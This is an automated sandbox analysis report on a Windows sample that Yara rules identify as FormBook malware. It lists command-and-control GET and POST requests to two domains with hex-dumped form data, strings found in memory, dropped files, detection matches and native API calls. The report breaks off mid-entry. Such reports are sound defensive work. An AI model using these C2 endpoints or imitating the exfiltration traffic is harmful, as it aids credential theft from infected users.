 Source: global traffic HTTP traffic detected: GET /k8b/?8pMx8v9p=Sc78I+Kxf/VxlwaPaPJkOLmTTyipGii8jZ5N2jAlgkHWx8NYJM9FuUX0xspAlguusSd1&Gzux=Wb2pdLjh7 HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /k8b/?8pMx8v9p=vAYaSr9qvHk7KCO7uWDlCoh8YGLtM5zRcLRoyBCgnX/aO/BnpSe24HN21iT/EXq7SkdF&Gzux=Wb2pdLjh7 HTTP/1.1Host: www.camdio.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.mensajera-radio.online
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.mensajera-radio.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mensajera-radio.online/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 61 2d 33 47 57 5a 6d 64 52 59 4e 74 37 79 58 50 41 66 45 75 59 66 4f 74 62 58 53 42 46 67 61 69 37 73 6b 62 76 7a 63 67 6c 30 4c 41 34 38 4e 68 4c 64 74 64 6b 67 32 6e 73 75 64 73 71 53 61 6a 6a 58 41 76 48 4c 28 6a 74 44 79 6b 37 61 52 5f 54 6e 57 33 39 49 78 33 6a 30 68 44 6f 6e 4f 57 7e 49 66 4a 64 31 78 4f 66 64 77 74 79 7a 70 6f 67 46 42 4d 4d 45 67 48 75 58 45 45 72 39 38 74 64 34 6c 63 55 41 69 42 4a 2d 43 41 52 32 78 51 6b 79 65 41 64 63 7e 57 33 49 77 7a 41 38 4c 57 56 6a 41 72 42 41 34 69 62 48 53 43 45 33 72 6a 6c 70 67 51 6f 5a 65 6a 70 47 59 58 69 52 69 37 66 38 4d 41 78 51 79 6f 44 6c 78 44 72 39 7a 56 41 7a 70 66 78 35 33 33 68 66 35 78 5a 79 48 2d 4a 55 53 79 62 58 4a 43 79 31 30 50 45 72 71 4c 62 72 4e 30 74 7a 77 6e 6b 57 72 53 7e 48 37 36 46 4a 57 47 76 6d 39 6e 45 32 73 33 74 7a 6c 6a 59 30 4a 51 4b 36 4d 68 66 70 73 79 32 4b 33 4f 70 7a 70 31 46 4f 6e 33 7a 72 39 41 56 30 28 65 35 64 72 6a 42 75 35 5f 57 30 63 5f 52 4e 58 6f 47 64 6c 74 46 67 38 61 6a 38 65 66 54 75 6e 66 75 49 79 75 30 66 78 42 50 78 76 7a 45 41 4b 71 68 71 6c 63 78 2d 28 46 47 66 4a 69 34 39 67 36 49 5f 53 50 6b 46 67 71 79 5f 59 4e 4a 4a 4f 34 77 30 48 37 6b 72 38 6d 35 66 56 62 78 6b 59 30 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8pMx8v9p=a-3GWZmdRYNt7yXPAfEuYfOtbXSBFgai7skbvzcgl0LA48NhLdtdkg2nsudsqSajjXAvHL(jtDyk7aR_TnW39Ix3j0hDonOW~IfJd1xOfdwtyzpogFBMMEgHuXEEr98td4lcUAiBJ-CAR2xQkyeAdc~W3IwzA8LWVjArBA4ibHSCE3rjlpgQoZejpGYXiRi7f8MAxQyoDlxDr9zVAzpfx533hf5xZyH-JUSybXJCy10PErqLbrN0tzwnkWrS~H76FJWGvm9nE2s3tzljY0JQK6Mhfpsy2K3Opzp1FOn3zr9AV0(e5drjBu5_W0c_RNXoGdltFg8aj8efTunfuIyu0fxBPxvzEAKqhqlcx-(FGfJi49g6I_SPkFgqy_YNJJO4w0H7kr8m5fVbxkY0Yw).
 Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable) Show sources
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 12 Sep 2020 13:00:22 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6b 38 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: 404 Not Found

Not Found

The requested URL /k8b/ was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 Urls found in memory or binary data Show sources
 Source: explorer.exe, 00000004.00000003.548939099.0000000007E63000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.356903689.0000000004BBC000.00000004.00000001.sdmp String found in binary or memory: http://en.ws Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 00000004.00000003.548939099.0000000007E63000.00000004.00000001.sdmp String found in binary or memory: http://schemas.mioft.com/win/2004/08/events/e Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378004309.0000000004A80000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/DataSet1.xsd Source: explorer.exe, 00000004.00000000.379746534.0000000002280000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357829186.0000000004BBF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000004.00000000.395898665.0000000007C99000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J Source: cmd.exe, 0000000D.00000002.621853417.00000000034A9000.00000004.00000001.sdmp String found in binary or memory: http://www.camdio.xyz Source: cmd.exe, 0000000D.00000002.621853417.00000000034A9000.00000004.00000001.sdmp String found in binary or memory: http://www.camdio.xyz/k8b/ Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com Source: explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers? Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.359230035.0000000004BCB000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersP Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.362113660.0000000004BC7000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersS Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.359095944.0000000004BCB000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersd Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378047605.0000000004BB0000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comcomf6 Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378047605.0000000004BB0000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.coml1 Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357463705.0000000004BEE000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357481879.0000000004BBC000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnd Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.360449526.0000000004BC7000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm/EN Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357880495.0000000004BBF000.00000004.00000001.sdmp String found in binary or memory: http://www.microsoftEl. Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.356332227.0000000004BCB000.00000004.00000001.sdmp, uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com: Source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com:: Source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033 Source: cmd.exe, 0000000D.00000002.619133496.00000000004F8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033 Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp, cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live Source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
 Creates a DirectInput object (often for capturing keystrokes) Show sources
 Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.375722005.000000000084A000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Source: C:\Windows\SysWOW64\cmd.exe Dropped file: C:\Users\user\AppData\Roaming\L6725004\L67logri.ini Jump to dropped file Source: C:\Windows\SysWOW64\cmd.exe Dropped file: C:\Users\user\AppData\Roaming\L6725004\L67logrv.ini Jump to dropped file
 Malicious sample detected (through community Yara rule) Show sources
 Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04A60BEE NtQuerySystemInformation, 0_2_04A60BEE Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04A60BB3 NtQuerySystemInformation, 0_2_04A60BB3 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00419C90 NtCreateFile, 3_2_00419C90 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00419D40 NtReadFile, 3_2_00419D40 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00419DC0 NtClose, 3_2_00419DC0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00419E70 NtAllocateVirtualMemory, 3_2_00419E70 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00419D3A NtReadFile, 3_2_00419D3A Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A99A0 NtCreateSection,LdrInitializeThunk, 3_2_019A99A0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_019A9910 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_019A98F0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9840 NtDelayExecution,LdrInitializeThunk, 3_2_019A9840 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_019A9860 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_019A9A00 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9A20 NtResumeThread,LdrInitializeThunk, 3_2_019A9A20 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9A50 NtCreateFile,LdrInitializeThunk, 3_2_019A9A50 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A95D0 NtClose,LdrInitializeThunk, 3_2_019A95D0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9540 NtReadFile,LdrInitializeThunk, 3_2_019A9540 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_019A9780 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_019A97A0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_019A9710 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_019A96E0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_019A9660 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A99D0 NtCreateProcessEx, 3_2_019A99D0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9950 NtQueueApcThread, 3_2_019A9950 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A98A0 NtWriteVirtualMemory, 3_2_019A98A0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9820 NtEnumerateKey, 3_2_019A9820 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019AB040 NtSuspendThread, 3_2_019AB040 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019AA3B0 NtGetContextThread, 3_2_019AA3B0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9B00 NtSetValueKey, 3_2_019A9B00 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9A80 NtOpenDirectoryObject, 3_2_019A9A80 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9A10 NtQuerySection, 3_2_019A9A10 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A95F0 NtQueryInformationFile, 3_2_019A95F0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019AAD30 NtSetContextThread, 3_2_019AAD30 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9520 NtWaitForSingleObject, 3_2_019A9520 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9560 NtWriteFile, 3_2_019A9560 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9FE0 NtCreateMutant, 3_2_019A9FE0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019AA710 NtOpenProcessToken, 3_2_019AA710 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9730 NtQueryVirtualMemory, 3_2_019A9730 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019AA770 NtOpenThread, 3_2_019AA770 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9770 NtSetInformationFile, 3_2_019A9770 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9760 NtOpenProcess, 3_2_019A9760 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A96D0 NtCreateKey, 3_2_019A96D0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9610 NtEnumerateValueKey, 3_2_019A9610 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9650 NtQueryValueKey, 3_2_019A9650 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9670 NtQueryInformationProcess, 3_2_019A9670 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39A50 NtCreateFile,LdrInitializeThunk, 13_2_02E39A50 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39860 NtQuerySystemInformation,LdrInitializeThunk, 13_2_02E39860 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39840 NtDelayExecution,LdrInitializeThunk, 13_2_02E39840 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E399A0 NtCreateSection,LdrInitializeThunk, 13_2_02E399A0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 13_2_02E39910 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E396E0 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_02E396E0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E396D0 NtCreateKey,LdrInitializeThunk, 13_2_02E396D0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39FE0 NtCreateMutant,LdrInitializeThunk, 13_2_02E39FE0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39780 NtMapViewOfSection,LdrInitializeThunk, 13_2_02E39780 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39770 NtSetInformationFile,LdrInitializeThunk, 13_2_02E39770 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39710 NtQueryInformationToken,LdrInitializeThunk, 13_2_02E39710 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E395D0 NtClose,LdrInitializeThunk, 13_2_02E395D0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39560 NtWriteFile,LdrInitializeThunk, 13_2_02E39560 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39540 NtReadFile,LdrInitializeThunk, 13_2_02E39540 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39A80 NtOpenDirectoryObject, 13_2_02E39A80 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39A20 NtResumeThread, 13_2_02E39A20 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39A00 NtProtectVirtualMemory, 13_2_02E39A00 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39A10 NtQuerySection, 13_2_02E39A10 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E3A3B0 NtGetContextThread, 13_2_02E3A3B0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39B00 NtSetValueKey, 13_2_02E39B00 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E398F0 NtReadVirtualMemory, 13_2_02E398F0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 